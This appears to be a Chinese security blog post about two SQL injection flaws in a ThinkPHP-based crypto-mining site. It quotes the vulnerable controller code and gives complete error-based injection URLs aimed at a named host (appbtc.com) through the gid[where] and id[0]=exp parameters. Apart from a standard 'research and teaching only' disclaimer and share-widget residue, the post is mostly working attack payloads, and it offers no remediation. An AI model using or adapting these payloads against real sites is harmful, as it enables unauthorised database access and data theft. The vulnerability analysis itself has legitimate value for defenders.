某挖矿系统漏洞
网上很多挖矿系统都是由thinkphp框架开发,框架本身是没什么漏洞的,但是到了开发的手上那就不一样了,开发稍微不当,可能就会导致漏洞的产生。
前几天发表了这篇文章,thinkphp一些版本的通杀漏洞payload 漏洞方面也是来源这里。
第一个漏洞
http://appbtc.com/index.php/index/shop/index?gid[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23
漏洞片段
public function index(){ $items = M('goods'); $gao = C('max_danjia'); $rmb_hl = C('rmb_hl'); $itemsdata = $items->find($_GET['gid']); $spjiage = sprintf("%.2f", $itemsdata['goldprice'] / $rmb_hl / $gao);
第二个漏洞
//公告详细页 public function newsView(){ //$data['truename'] = I('post.truename','','htmlspecialchars'); // $id = I('id'); $new = M('announce')->where(array('id'=>I('id')))->find(); $this->assign('new',$new); $this->display(); }
http://appbtc.com/index.php/index/new/newsView?id[0]=exp&id[1]%20==1))%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)%23
不懂? 去研究一下 本博客的 有关thinkphp漏洞方面的文章。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论